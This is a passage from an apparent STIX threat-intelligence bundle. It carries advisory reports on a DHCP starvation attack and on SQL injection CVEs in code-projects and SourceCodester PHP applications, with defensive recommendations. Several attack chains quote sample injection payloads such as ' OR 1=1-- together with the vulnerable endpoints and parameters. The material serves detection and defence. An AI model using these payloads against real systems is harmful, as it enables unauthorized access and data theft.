      "description": "## Overview\n\nThis threat involves a network-based denial of service attack known as DHCP starvation. Attackers generate an unusually high volume of DHCP DISCOVER messages, each containing a distinct, often spoofed or randomly generated, client hardware (MAC) address. This flood aims to rapidly deplete the legitimate DHCP server's available IP address pool. The attack typically occurs on the same capture segment within a short time window and can leave legitimate network clients unable to obtain or renew IP addresses. This technique is frequently used as a precursor to deploying a rogue DHCP server, allowing attackers to control network configurations for clients and facilitate further malicious activities such as Man-in-the-Middle attacks.\n\n## Attack Chain\n\n1.  **Attacker Pre-computation/Setup**: The attacker prepares specialized tools or scripts capable of rapidly generating DHCP DISCOVER messages.\n2.  **Network Access**: The attacker gains network access to the target broadcast segment where DHCP clients communicate with the DHCP server.\n3.  **DHCP DISCOVER Flood Initiation**: The attacker initiates a flood of DHCP DISCOVER messages onto the network segment.\n4.  **MAC Address Spoofing**: Each DHCP DISCOVER message is crafted with a unique, spoofed, or randomly generated client MAC address to appear as distinct clients.\n5.  **DHCP Lease Pool Exhaustion**: The legitimate DHCP server attempts to process these numerous DISCOVER requests by assigning IP addresses and leases to each unique MAC address, rapidly depleting its available IP address pool.\n6.  **Denial of Service for Legitimate Clients**: As the DHCP lease pool becomes exhausted, legitimate client devices on the network segment are unable to obtain or renew IP addresses, leading to a denial of service for these devices.\n7.  **Rogue DHCP Server Deployment (Potential Follow-up)**: This starvation often serves as a preparatory step, enabling the attacker to deploy a rogue DHCP server that can then offer malicious network configurations (e.g., rogue DNS servers, default gateways) to clients, facilitating further attacks like Man-in-the-Middle.\n\n## Impact\n\nThe primary impact of a successful DHCP starvation attack is the denial of service for legitimate network clients, rendering them unable to connect to the network or access resources. This leads to widespread operational disruption across affected segments. If followed by a rogue DHCP server, attackers can redirect traffic, intercept communications, or serve malicious content, leading to data exfiltration, system compromise, and significant financial and reputational damage. While no specific victim count or sectors are mentioned, any organization relying on DHCP for IP address management is vulnerable.\n\n## Recommendation\n\n*   Enable network traffic logging and DHCP message parsing via tools like Packetbeat or similar network monitoring solutions, specifically targeting UDP ports 67/68, to provide the necessary telemetry for detecting DHCP starvation.\n*   Review DHCP server logs (e.g., Windows DHCP server logs, ISC DHCPd logs) for signs of IP pool exhaustion, NAK spikes, or lease-denial events that correlate with suspected DHCP starvation attempts.\n*   Configure and monitor network devices for rogue DHCP OFFER/ACK activity, potentially using dedicated detection rules for \"Multiple DHCP Servers Responding to the Same Transaction\" as mentioned in the Elastic guide.\n*   Implement DHCP snooping and rate limiting on network access switches to mitigate and prevent DHCP starvation attacks by controlling legitimate DHCP traffic and blocking spoofed or excessive DISCOVER messages.\n*   Leverage switch CAM tables (e.g., via SNMP or CLI automation) to identify the physical port and source host associated with any observed high volume of DHCP DISCOVER messages.\n",
      "published": "2026-07-05T01:27:06Z",
      "labels": [
        "network-attack",
        "denial-of-service",
        "network-security-monitoring",
        "impact"
      ],
      "object_refs": [
        "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://attack.mitre.org/techniques/T1498/"
        },
        {
          "source_name": "reference",
          "url": "https://www.leviathansecurity.com/blog/tunnelvision"
        },
        {
          "source_name": "reference",
          "url": "https://wazuh.com/blog/monitoring-dhcp-starvation-attack-with-suricata-and-wazuh/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c8529323-9dd6-5d76-a531-95ad1fd7763d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://code-projects.org/",
      "pattern": "[url:value = 'https://code-projects.org/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T23:20:30Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--28a9c1e4-feeb-5911-bf6b-a0806cfac740",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--910a200d-3ae8-5594-9fdd-fee49c0cadf1",
      "target_ref": "indicator--c8529323-9dd6-5d76-a531-95ad1fd7763d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--41c7a66d-2cb5-5b59-ab30-6ff0bace712e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/aiyuyuyu/cve/blob/main/job_portal_sql.md",
      "pattern": "[url:value = 'https://github.com/aiyuyuyu/cve/blob/main/job_portal_sql.md']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T23:20:30Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eba90317-5544-50e5-80a6-b8d735c8fe3b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--910a200d-3ae8-5594-9fdd-fee49c0cadf1",
      "target_ref": "indicator--41c7a66d-2cb5-5b59-ab30-6ff0bace712e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b5d30a4a-fbb5-5b58-ba03-5cbe4b9643de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: code-projects.org",
      "pattern": "[domain-name:value = 'code-projects.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T23:20:30Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--436b328c-b368-574a-aba8-0b7d3f6fb740",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--910a200d-3ae8-5594-9fdd-fee49c0cadf1",
      "target_ref": "indicator--b5d30a4a-fbb5-5b58-ba03-5cbe4b9643de"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--eea8a32d-7657-5636-bdb0-f410a3cb6442",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: github.com",
      "pattern": "[domain-name:value = 'github.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T23:20:30Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--93a38bc3-deb7-51c6-95c7-d1c6d011cacf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--910a200d-3ae8-5594-9fdd-fee49c0cadf1",
      "target_ref": "indicator--eea8a32d-7657-5636-bdb0-f410a3cb6442"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2e12d995-5d07-507e-bf23-d0bdcc864998",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: vuldb.com",
      "pattern": "[domain-name:value = 'vuldb.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T23:20:30Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a71b50f3-cc2a-59ca-8cce-ee870b39e6a1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--910a200d-3ae8-5594-9fdd-fee49c0cadf1",
      "target_ref": "indicator--2e12d995-5d07-507e-bf23-d0bdcc864998"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bcc2e9c3-178b-55bf-9fda-0be5bbc3181e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--910a200d-3ae8-5594-9fdd-fee49c0cadf1",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--910a200d-3ae8-5594-9fdd-fee49c0cadf1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14660: SQL Injection in code-projects Online Job Portal 1.0",
      "description": "## Overview\n\nA significant SQL injection vulnerability, tracked as CVE-2026-14660, has been identified in version 1.0 of the code-projects Online Job Portal. This flaw resides within the `login.php` file, where improper neutralization of special elements in the `txtUser` and `txtPass` arguments allows for SQL injection. Attackers can remotely exploit this weakness without authentication, manipulating the database queries to bypass login mechanisms or extract sensitive information. The vulnerability has been publicly disclosed, including the availability of exploit code, which significantly elevates the immediate threat level. Organizations using this specific version of the Online Job Portal are at high risk of unauthorized access, data compromise, and potential system manipulation if exposed to the internet.\n\n## Attack Chain\n\n1.  **Initial Reconnaissance**: An attacker identifies an instance of `code-projects Online Job Portal 1.0` exposed on the internet.\n2.  **Vulnerability Identification**: The attacker determines that the `login.php` endpoint is vulnerable to SQL injection through its `txtUser` and `txtPass` parameters.\n3.  **Craft Malicious Request**: The attacker crafts an HTTP POST request targeting `login.php`, embedding SQL injection payloads (e.g., `' OR '1'='1`) into the `txtUser` and/or `txtPass` fields.\n4.  **Injection Execution**: The vulnerable `login.php` script processes the unvalidated input, inadvertently executing the malicious SQL query against the underlying database.\n5.  **Authentication Bypass/Information Disclosure**: The malicious query either bypasses the authentication logic, granting the attacker unauthorized access, or extracts sensitive database content (e.g., user credentials, personal data).\n6.  **Post-Exploitation Activity**: With unauthorized access, the attacker can then modify existing data, inject new data, or continue to exfiltrate further sensitive information from the database, potentially leading to complete data compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14660 can lead to severe consequences for organizations utilizing the affected Online Job Portal. Attackers can achieve unauthorized access to the application, potentially gaining administrative privileges, which allows for complete control over user accounts, job postings, and applicant data. This could result in the theft of sensitive personal identifiable information (PII), intellectual property, or confidential business data. The public availability of an exploit increases the likelihood of widespread exploitation by various threat actors, potentially affecting a broad range of small to medium-sized organizations using this specific project. Data manipulation could also lead to data integrity issues or service disruption.\n\n## Recommendation\n\n*   **Patch CVE-2026-14660 immediately** by upgrading `code-projects Online Job Portal` to a patched version or applying vendor-supplied mitigations, as highlighted in the NVD entry and VulDB references.\n*   **Deploy the provided Sigma rule** to your SIEM to detect attempts at SQL injection against your web applications.\n*   **Review web server logs** for suspicious requests targeting `login.php` with SQL injection payloads, correlating with the patterns described in the detection rule.\n*   **Implement a Web Application Firewall (WAF)** in front of your Online Job Portal to filter and block malicious SQL injection attempts before they reach the application.\n",
      "published": "2026-07-04T23:20:30Z",
      "labels": [
        "sql-injection",
        "web-application",
        "cve",
        "initial-access"
      ],
      "object_refs": [
        "indicator--c8529323-9dd6-5d76-a531-95ad1fd7763d",
        "indicator--41c7a66d-2cb5-5b59-ab30-6ff0bace712e",
        "indicator--b5d30a4a-fbb5-5b58-ba03-5cbe4b9643de",
        "indicator--eea8a32d-7657-5636-bdb0-f410a3cb6442",
        "indicator--2e12d995-5d07-507e-bf23-d0bdcc864998",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14660"
        },
        {
          "source_name": "reference",
          "url": "https://code-projects.org/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/aiyuyuyu/cve/blob/main/job_portal_sql.md"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14660"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/846744"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376174"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376174/cti"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--470ff0c3-8740-5f23-bd6e-8dba08293082",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://nvd.nist.gov/vuln/detail/CVE-2026-14654",
      "pattern": "[url:value = 'https://nvd.nist.gov/vuln/detail/CVE-2026-14654']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T21:20:52Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0409cb88-b6b8-5abd-a376-63c684252715",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--435137e3-b018-568f-8007-4c3d5389fd10",
      "target_ref": "indicator--470ff0c3-8740-5f23-bd6e-8dba08293082"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b87c2914-1f89-57ae-b729-3d1e641b2cfa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/Yuesswor/cve/issues/4",
      "pattern": "[url:value = 'https://github.com/Yuesswor/cve/issues/4']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T21:20:52Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2dbe3e58-36ea-5da0-a6c1-b21681965d03",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--435137e3-b018-568f-8007-4c3d5389fd10",
      "target_ref": "indicator--b87c2914-1f89-57ae-b729-3d1e641b2cfa"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d935faaa-60e8-5c61-a755-deecd67097dd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-14654",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-14654']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T21:20:52Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1cd250af-b873-5797-9ad6-a607f8cace9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--435137e3-b018-568f-8007-4c3d5389fd10",
      "target_ref": "indicator--d935faaa-60e8-5c61-a755-deecd67097dd"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fa9b9144-9d24-5537-91f9-64b773c6053b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/submit/846702",
      "pattern": "[url:value = 'https://vuldb.com/submit/846702']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T21:20:52Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1cf51684-cf29-59cf-a378-5c8d3f49de01",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--435137e3-b018-568f-8007-4c3d5389fd10",
      "target_ref": "indicator--fa9b9144-9d24-5537-91f9-64b773c6053b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--057173b9-893b-5ba1-8f68-c5c3cdb126f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376167",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376167']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T21:20:52Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ed155d0d-6cc7-5646-8366-0769790002d4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--435137e3-b018-568f-8007-4c3d5389fd10",
      "target_ref": "indicator--057173b9-893b-5ba1-8f68-c5c3cdb126f5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6fecb346-5038-5e7f-b3e6-e8314c796618",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376167/cti",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376167/cti']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T21:20:52Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0bb87968-cac0-5391-8bbe-b5e0a982f98b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--435137e3-b018-568f-8007-4c3d5389fd10",
      "target_ref": "indicator--6fecb346-5038-5e7f-b3e6-e8314c796618"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--80248a4b-2552-5f41-85cc-59a2020fbfde",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.sourcecodester.com/",
      "pattern": "[url:value = 'https://www.sourcecodester.com/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T21:20:52Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebe2bdd9-fe37-54fc-982c-a47b1e07697c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--435137e3-b018-568f-8007-4c3d5389fd10",
      "target_ref": "indicator--80248a4b-2552-5f41-85cc-59a2020fbfde"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--da5621a9-58dd-5102-b4c4-28a7d4931067",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--435137e3-b018-568f-8007-4c3d5389fd10",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--435137e3-b018-568f-8007-4c3d5389fd10",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14654: Remote SQL Injection in SourceCodester Simple and Nice Shopping Cart Script",
      "description": "## Overview\n\nA critical SQL injection vulnerability, identified as CVE-2026-14654, has been discovered in version 1.0 of the SourceCodester Simple and Nice Shopping Cart Script. This flaw specifically affects an unknown function within the `/admin/girlsproductdeletequery.php` file, where improper neutralization of special elements in the `user_id` argument leads to SQL injection. The vulnerability allows a remote and unauthenticated attacker to inject malicious SQL commands into database queries. The exploit for this vulnerability is publicly available, increasing the likelihood of its use in the wild. This poses a significant risk to organizations utilizing the affected software, enabling potential unauthorized access, data manipulation, or even remote code execution if the underlying database user has elevated privileges. The vulnerability was published on July 4, 2026.\n\n## Attack Chain\n\n1. An attacker identifies an internet-facing instance of SourceCodester Simple and Nice Shopping Cart Script 1.0.\n2. The attacker crafts a malicious HTTP GET or POST request to the `/admin/girlsproductdeletequery.php` endpoint.\n3. The request includes specially constructed SQL injection payloads within the `user_id` parameter, such as `' OR 1=1--` or `UNION SELECT ...`.\n4. The vulnerable application processes the `user_id` argument without adequate sanitization, causing the injected SQL commands to be executed by the backend database.\n5. Successful injection allows the attacker to bypass authentication, query sensitive database information (e.g., user credentials, product details), modify existing data, or delete records.\n6. Depending on the database system and the privileges of the database user account, the attacker may escalate the SQL injection to achieve remote code execution (RCE) on the underlying web server.\n7. If RCE is successful, the attacker can establish persistent access mechanisms, such as deploying web shells or other backdoors.\n8. The final objective often includes data exfiltration, website defacement, or broader compromise of the hosting infrastructure.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14654 can lead to severe consequences for affected organizations. Attackers can gain unauthorized access to the application's database, allowing for the theft of sensitive customer and product information, modification of order details, or deletion of critical data. While specific victim counts or targeted sectors are not available, any organization using SourceCodester Simple and Nice Shopping Cart Script 1.0 is at risk. The publicly available exploit further exacerbates the threat, making it easier for malicious actors to compromise systems and disrupt business operations.\n\n## Recommendation\n\n*   Immediately patch SourceCodester Simple and Nice Shopping Cart Script 1.0 if an official update is available, or remove the affected component from internet exposure.\n*   Deploy the Sigma rule \"Detect CVE-2026-14654 Exploitation - SQL Injection in Shopping Cart Script\" to your SIEM for early detection of exploitation attempts.\n*   Monitor web server access logs for requests targeting `/admin/girlsproductdeletequery.php` that contain unusual or suspicious characters and SQL keywords as described in the detection rule.\n*   Review the references provided, particularly https://github.com/Yuesswor/cve/issues/4 and https://vuldb.com/vuln/376167, for potential workarounds or additional mitigation details.\n",
      "published": "2026-07-04T21:20:52Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "cve",
        "sourcecodester",
        "shopping-cart"
      ],
      "object_refs": [
        "indicator--470ff0c3-8740-5f23-bd6e-8dba08293082",
        "indicator--b87c2914-1f89-57ae-b729-3d1e641b2cfa",
        "indicator--d935faaa-60e8-5c61-a755-deecd67097dd",
        "indicator--fa9b9144-9d24-5537-91f9-64b773c6053b",
        "indicator--057173b9-893b-5ba1-8f68-c5c3cdb126f5",
        "indicator--6fecb346-5038-5e7f-b3e6-e8314c796618",
        "indicator--80248a4b-2552-5f41-85cc-59a2020fbfde",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14654"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/Yuesswor/cve/issues/4"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/cve/CVE-2026-14654"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/submit/846702"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376167"
        },
        {
          "source_name": "reference",
          "url": "https://vuldb.com/vuln/376167/cti"
        },
        {
          "source_name": "reference",
          "url": "https://www.sourcecodester.com/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--79eecf48-6b0f-5ff1-8d4d-4415e9cd2bb7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/sunjingyuan123/ccvvee/issues/1",
      "pattern": "[url:value = 'https://github.com/sunjingyuan123/ccvvee/issues/1']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T19:24:10Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bc7d73c2-0ad7-5103-b56f-af5f2558d5ab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8f17d27c-b0d7-590d-bdd1-7b946b3ba19a",
      "target_ref": "indicator--79eecf48-6b0f-5ff1-8d4d-4415e9cd2bb7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--525d873b-3b5e-52cf-a333-3bf7a572612e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/cve/CVE-2026-14642",
      "pattern": "[url:value = 'https://vuldb.com/cve/CVE-2026-14642']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T19:24:10Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2e97abaf-f9e7-5818-9f08-0646f8c2d177",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8f17d27c-b0d7-590d-bdd1-7b946b3ba19a",
      "target_ref": "indicator--525d873b-3b5e-52cf-a333-3bf7a572612e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c8464d13-52be-5b3f-aa0a-847a221c61eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://vuldb.com/vuln/376158",
      "pattern": "[url:value = 'https://vuldb.com/vuln/376158']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T19:24:10Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fa2eb0b7-34f0-5268-a704-cbfc1efb184d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8f17d27c-b0d7-590d-bdd1-7b946b3ba19a",
      "target_ref": "indicator--c8464d13-52be-5b3f-aa0a-847a221c61eb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--296baa6d-e8a0-575b-8dc9-f24817c96194",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.sourcecodester.com/",
      "pattern": "[url:value = 'https://www.sourcecodester.com/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-04T19:24:10Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aebd9775-111c-5c86-8d48-e5f76bc70605",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8f17d27c-b0d7-590d-bdd1-7b946b3ba19a",
      "target_ref": "indicator--296baa6d-e8a0-575b-8dc9-f24817c96194"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9bffb01a-6b12-544c-b333-92edee269cb0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8f17d27c-b0d7-590d-bdd1-7b946b3ba19a",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8f17d27c-b0d7-590d-bdd1-7b946b3ba19a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14642: SourceCodester Class and Exam Timetabling System SQL Injection",
      "description": "## Overview\n\nA significant vulnerability, tracked as CVE-2026-14642, has been discovered in SourceCodester Class and Exam Timetabling System version 1.0. This flaw specifically affects an unknown functionality within the `/edit_class2.php` file, where improper handling of the `ID` argument allows for SQL injection. The vulnerability can be exploited remotely by an unauthenticated attacker, posing a substantial risk to organizations utilizing this system. The public availability of an exploit intensifies the threat, making it highly probable for malicious actors to leverage this weakness for unauthorized access to sensitive database information, data manipulation, or even further system compromise. Defenders must prioritize patching or mitigating this vulnerability immediately to prevent potential data breaches and system integrity compromises.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a SourceCodester Class and Exam Timetabling System 1.0 instance accessible over the internet.\n2.  The attacker crafts a specially malformed HTTP GET request targeting the `/edit_class2.php` endpoint.\n3.  The attacker manipulates the `ID` argument in the URL query string by injecting SQL metacharacters and payloads (e.g., `' OR 1=1--`).\n4.  The vulnerable application processes this request without proper input validation, incorporating the malicious payload directly into a database query.\n5.  The backend database executes the attacker-controlled SQL query, potentially disclosing sensitive data, modifying existing records, or executing arbitrary commands (if the database user has sufficient privileges).\n6.  The application responds to the attacker with the results of the executed SQL query, allowing for data exfiltration or confirmation of successful command execution.\n7.  The attacker extracts sensitive information from the database or uses the RCE capabilities to establish persistence or pivot further into the network.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14642 can lead to severe consequences for affected organizations. Attackers can gain unauthorized access to the application's underlying database, potentially exfiltrating sensitive student or class scheduling data, modifying records, or even deleting critical information. Given the nature of SQL injection, this could result in a complete compromise of confidentiality, integrity, and availability of the application's data. As the exploit is publicly available, organizations running the affected version are at immediate risk of data breaches and operational disruption. The CVSS score of 7.3 (High) reflects the significant potential for impact.\n\n## Recommendation\n\n*   Patch CVE-2026-14642 by upgrading SourceCodester Class and Exam Timetabling System to a version where this vulnerability has been fixed, if available, or applying vendor-supplied patches immediately.\n*   Implement a Web Application Firewall (WAF) to detect and block malicious HTTP requests targeting `/edit_class2.php` with SQL injection payloads, as indicated by the Sigma rule below.\n*   Deploy the Sigma rule titled \"Detect CVE-2026-14642 Exploitation — SourceCodester SQL Injection\" to your SIEM and tune for your environment, ensuring it triggers on requests to `/edit_class2.php` with suspicious `ID` parameters.\n*   Review web server logs for `/edit_class2.php` access patterns, especially for `cs-uri-query` fields containing SQL injection artifacts, to identify potential exploitation attempts.\n*   Implement strict input validation for all user-supplied input, especially for the `ID` parameter used in `/edit_class2.php`, to prevent SQL injection.\n",
      "published": "2026-07-04T19:24:10Z",
      "labels": [
        "web-application",
        "sql-injection",
        "remote-code-execution",
        "data-exfiltration",
        "vulnerability",
        "cve"
      ],
      "object_refs": [
        "indicator--79eecf48-6b0f-5ff1-8d4d-4415e9cd2bb7",
        "indicator--525d873b-3b5e-52cf-a333-3bf7a572612e",
        "indicator--c8464d13-52be-5b3f-aa0a-847a221c61eb",
        "indicator--296baa6d-e8a0-575b-8dc9-f24817c96194",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
